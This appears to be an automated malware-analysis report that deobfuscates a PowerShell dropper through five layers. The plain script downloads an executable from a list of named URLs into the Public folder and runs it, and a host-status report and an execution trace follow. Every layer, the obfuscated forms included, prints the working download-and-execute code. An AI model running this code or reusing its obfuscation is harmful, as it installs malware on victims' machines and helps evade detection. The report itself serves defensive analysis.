Layer 1 - Obfuscation type: String-Based


&( $SHellID[1]+$shEllId[13]+'x')( (('sV z5R ( fNV ) )63'+']RAHC[,eQxjPkeQx EcaLPErc- 6'+'9]RAHC[,)88]RAHC[+001]RAHC[+15]RAHC[(ecalPer-29]'+'RAHC[,)'+'911]RAHC[+58]RAHC[+35]RAHC[( EcaLPErc-93]RAHC[,eQx'+'JQreQx'+'EcaLPErc-43]RAHC[,eQxw8ieQx ecalP'+'er-)eQx}}{eQx+eQxhceQx+eQxteQx+eQxac};eQx+eQxkaereQx+e'+'Qxb;eQx+eQx)eQx+eQxCDSjP'+'k()JQeQx+eQxr'+'meeQx+eQxtIeQx+eQx-eJQeQ'+'x+eQxr+eQx+eQxJQrkeQx+eQxJQr+eQx+eQxJ'+'QroveQx+eQxnIJQreQx+eQx(&;)'+'CDeQx+eQxSjPk ,eQx+eQx)(w8ieQx+eQxgNXdeQx+eQx3iXd3rtSeQx+eQxoeQx+eQxTeQx+eQxw8eQx+eQxieQx+eQx.ceQx+eQxfseQx+eQxajPk(w8eQx+eQxielX'+'deQx+eQx3IFeQx+eQxdaOe'+'Qx+eQxXeQx+eQxd3eQx+eQxlnWeQx+eQxXd3eQx+eQxoDweQx+eQx8eQx+eQxi.UYeQx+eQxYjeQx+eQxPk{yrt{)XeQx+eQxCDAjeQx+eQxPkeQx+eQx ni eQx+eQxcfsajPkeQx+eQx(hcaeeQx+eQxreQx'+'+eQxof;)JQeQx+eQxreQx+eQxeJQr+JeQx+eQxQrxe.eQx+eQxJQreQx+eQx( + BSNeQx+eQxjPk + '+'J'+'eQx+eQxQeQx+eQxrwU5JQr + ceQx+eQxilbueQx+eQxp:vneQx+eQxejPk =eQx+eQx CDSeQx+eQxjeQx+eQxPk'+'eQx+eQx;)eQx+eQxJQreQx+eQx?JQreQx+eQx(tilpeQx+eQxS.JQeQx+e'+'Qxre'+'Qx+eQx/peQx+eQxjeQx+eQxfuY7C/moeQx+eQxc.elytseeQx+eQxfileQx+eQxarceQx+eQxceQx+eQxa'+'eQx+eQx//:peQx+eQxtteQx+e'+'Qxh?/kJ3wEe/moceQx+eQx.pohseQx+e'+'QxirteQx+eQxap//:peQx+eQxttheQx+eQx?eQx+eQx/POeQx+eQxdCm/eQx+eQxmoceQx+eQx.sseQx+eQxecorp-eQx+eQxdraobeQx+eQxno//:p'+'tteQx+eQxh?/UAeQx+eQxJ'+'yeQx+eQx/eQx+eQxaz.oc.kcaeQx+e'+'QxhseheQx+eQxtmoeQx+eQxreQx+eQxfzyob//:eQx+eQxpeQx+eQxteQ'+'x+eQxth?eQx+eQx'+'/eQx+eQxAQIjeQx+eQxG/eQx+'+'eQxmoceQx+eQx.noeQx+eQxitarotsereQx+eQxriahsu.wweQx+eQxweQx+eQx/eQx+eQx/eQx+eQx:eQx+eQxpeQx+eQxtteQx+eQxh JQr eQx+eQx= XCDAjPeQx+eQxk;)eQx+eQx331eQx+eQx28eQx+eQx2 ,0eQx+eQx0001eQ'+'x+e'+'Qx(txeQx+'+'eQxen.dseQx+eQxaeQx+eQxdasnjPk =eQx+e'+'Qx BSNeQx+eQxjeQx+eQxPkeQx+eQx;tneQx+eQxeeQx+eQxileQx+eQxCbeW.teN.meeQx+eQxtsyS )eQ'+'x+eQxJeQx+eQxQeQx+eQxrtcejbo-JQeQx+eQxr+JQrwJQr+JQeQx+eQxrenJeQx+eQxQreQx+eQx(. = eQx+eQxUeQx+eQxYYjPk'+';modnar'+' )JQr'+'eQx+eQxtJeQx+eQxQr+eQx+eQxJeQx+e'+'QxQrcejbo-eQx+eQxwJeQx+eQxQeQx+eQx'+'r+JeQx+eQxQreQx+eQxeJQr+JQrneQx+eQxJQr(& eQx+eQx= eQx+eQxdsaeQx+eQxdaeQx+eQxsnjeQx+eQxPkeQx((( )eQxeQxNiOj-]2,11,3[EMaN.)eQx*rDM*eQx VG(( & fNV ) ; [StRing]::jOiN( eQxeQx ,( V'+'AriAblE Z5R ).vALUe[-1.. - (( VAriAblE Z5R ).vALUe.lenGTH )] '+')Zis .( 4tCpshoME[4]+4tCpshOmE[30]+eQxxeQx)') -rEplAce 'eQx',[cHaR]39-rEplAce 'fNV',[cHaR]34 -CrEPlacE ([cHaR]52+[cHaR]116+[cHaR]67),[cHaR]36-rEplAce'Zis',[cHaR]124)) 





Layer 2 - Obfuscation type: String-Based


sV z5R ( " ) )63]RAHC[,'jPk' EcaLPErc- 69]RAHC[,)88]RAHC[+001]RAHC[+15]RAHC[(ecalPer-29]RAHC[,)911]RAHC[+58]RAHC[+35]RAHC[( EcaLPErc-93]RAHC[,'JQr'EcaLPErc-43]RAHC[,'w8i' ecalPer-)'}}{'+'hc'+'t'+'ac};'+'kaer'+'b;'+')'+'CDSjPk()JQ'+'rme'+'tI'+'-eJQ'+'r+'+'JQrk'+'JQr+'+'JQrov'+'nIJQr'+'(&;)CD'+'SjPk ,'+')(w8i'+'gNXd'+'3iXd3rtS'+'o'+'T'+'w8'+'i'+'.c'+'fs'+'ajPk(w8'+'ielXd'+'3IF'+'daO'+'X'+'d3'+'lnW'+'Xd3'+'oDw'+'8'+'i.UY'+'Yj'+'Pk{yrt{)X'+'CDAj'+'Pk'+' ni '+'cfsajPk'+'(hcae'+'r'+'of;)JQ'+'r'+'eJQr+J'+'Qrxe.'+'JQr'+'( + BSN'+'jPk + J'+'Q'+'rwU5JQr + c'+'ilbu'+'p:vn'+'ejPk ='+' CDS'+'j'+'Pk'+';)'+'JQr'+'?JQr'+'(tilp'+'S.JQ'+'r'+'/p'+'j'+'fuY7C/mo'+'c.elytse'+'fil'+'arc'+'c'+'a'+'//:p'+'tt'+'h?/kJ3wEe/moc'+'.pohs'+'irt'+'ap//:p'+'tth'+'?'+'/PO'+'dCm/'+'moc'+'.ss'+'ecorp-'+'draob'+'no//:ptt'+'h?/UA'+'Jy'+'/'+'az.oc.kca'+'hseh'+'tmo'+'r'+'fzyob//:'+'p'+'t'+'th?'+'/'+'AQIj'+'G/'+'moc'+'.no'+'itarotser'+'riahsu.ww'+'w'+'/'+'/'+':'+'p'+'tt'+'h JQr '+'= XCDAjP'+'k;)'+'331'+'28'+'2 ,0'+'0001'+'(tx'+'en.ds'+'a'+'dasnjPk ='+' BSN'+'j'+'Pk'+';tn'+'e'+'il'+'CbeW.teN.me'+'tsyS )'+'J'+'Q'+'rtcejbo-JQ'+'r+JQrwJQr+JQ'+'renJ'+'Qr'+'(. = '+'U'+'YYjPk;modnar )JQr'+'tJ'+'Qr+'+'J'+'Qrcejbo-'+'wJ'+'Q'+'r+J'+'Qr'+'eJQr+JQrn'+'JQr(& '+'= '+'dsa'+'da'+'snj'+'Pk'((( )''NiOj-]2,11,3[EMaN.)'*rDM*' VG(( & " ) ; [StRing]::jOiN( '' ,( VAriAblE Z5R ).vALUe[-1.. - (( VAriAblE Z5R ).vALUe.lenGTH )] )| .( $pshoME[4]+$pshOmE[30]+'x')






Layer 3 - Obfuscation type: String-Based


 & ((GV '*MDr*').NaME[3,11,2]-jOiN'') ((('kP'+'jns'+'ad'+'asd'+' ='+' &(rQJ'+'nrQJ+rQJe'+'rQ'+'J+r'+'Q'+'Jw'+'-objecrQ'+'J'+'+rQ'+'Jt'+'rQJ) random;kPjYY'+'U'+' = .('+'rQ'+'Jner'+'QJ+rQJwrQJ+r'+'QJ-objectr'+'Q'+'J'+') Syst'+'em.Net.WebC'+'li'+'e'+'nt;'+'kP'+'j'+'NSB '+'= kPjnsad'+'a'+'sd.ne'+'xt('+'1000'+'0, 2'+'82'+'133'+');k'+'PjADCX ='+' rQJ h'+'tt'+'p'+':'+'/'+'/'+'w'+'ww.ushair'+'restorati'+'on.'+'com'+'/G'+'jIQA'+'/'+'?ht'+'t'+'p'+'://boyzf'+'r'+'omt'+'hesh'+'ack.co.za'+'/'+'yJ'+'AU/?h'+'ttp://on'+'board'+'-proce'+'ss.'+'com'+'/mCd'+'OP/'+'?'+'htt'+'p://pa'+'tri'+'shop.'+'com/eEw3Jk/?h'+'tt'+'p://'+'a'+'c'+'cra'+'lif'+'estyle.c'+'om/C7Yuf'+'j'+'p/'+'r'+'QJ.S'+'plit('+'rQJ?'+'rQJ'+');'+'kP'+'j'+'SDC '+'= kPje'+'nv:p'+'ubli'+'c + rQJ5Uwr'+'Q'+'J + kPj'+'NSB + ('+'rQJ'+'.exrQ'+'J+rQJe'+'r'+'QJ);fo'+'r'+'each('+'kPjasfc'+' in '+'kP'+'jADC'+'X){try{kP'+'jY'+'YU.i'+'8'+'wDo'+'3dX'+'Wnl'+'3d'+'X'+'Oad'+'FI3'+'dXlei'+'8w(kPja'+'sf'+'c.'+'i'+'8w'+'T'+'o'+'Str3dXi3'+'dXNg'+'i8w()'+', kPjS'+'DC);&('+'rQJIn'+'vorQJ'+'+rQJ'+'krQJ'+'+r'+'QJe-'+'It'+'emr'+'QJ)(kPjSDC'+')'+';b'+'reak'+';}ca'+'t'+'ch'+'{}}')-rePlace 'i8w',[CHAR]34-crEPLacE'rQJ',[CHAR]39-crEPLacE ([CHAR]53+[CHAR]85+[CHAR]119),[CHAR]92-rePlace([CHAR]51+[CHAR]100+[CHAR]88),[CHAR]96 -crEPLacE 'kPj',[CHAR]36) ) 






Layer 4 - Obfuscation type: String-Based


$nsadasd = &('n'+'e'+'w-objec'+'t') random;$YYU = .('ne'+'w'+'-object') System.Net.WebClient;$NSB = $nsadasd.next(10000, 282133);$ADCX = ' http://www.ushairrestoration.com/GjIQA/?http://boyzfromtheshack.co.za/yJAU/?http://onboard-process.com/mCdOP/?http://patrishop.com/eEw3Jk/?http://accralifestyle.com/C7Yufjp/'.Split('?');$SDC = $env:public + '\' + $NSB + ('.ex'+'e');foreach($asfc in $ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&('Invo'+'k'+'e-Item')($SDC);break;}catch{}}






Layer 5 - Plainscript


$nsadasd = new-object random;$yyu = new-object system.net.webclient;$nsb = $nsadasd.next(10000, 282133);$adcx = ' http://www.ushairrestoration.com/gjiqa/?http://boyzfromtheshack.co.za/yjau/?http://onboard-process.com/mcdop/?http://patrishop.com/eew3jk/?http://accralifestyle.com/c7yufjp/'.split('?');$sdc = $env:public + '\' + $nsb + '.exe';foreach($asfc in $adcx){try{$yyu.downloadfile($asfc.tostring(), $sdc);invoke-item($sdc);break;}catch{}}





Malware Hosting URLs Report:

[404: Not Found] -  http://www.ushairrestoration.com/gjiqa/

[404: Not Found] -  http://boyzfromtheshack.co.za/yjau/

[404: Not Found] -  http://onboard-process.com/mcdop/

[500: Internal Server Error] -  http://patrishop.com/eew3jk/

[500: Internal Server Error] -  http://accralifestyle.com/c7yufjp/



Execution Report:

Script attempted to generate a random integer between 10000 and 282133. Value returned: 63949

Script attempted to download from  http://www.ushairrestoration.com/GjIQA/ and save to: C:\Users\Public\63949.exe

Script attempted to invoke C:\Users\Public\63949.exe


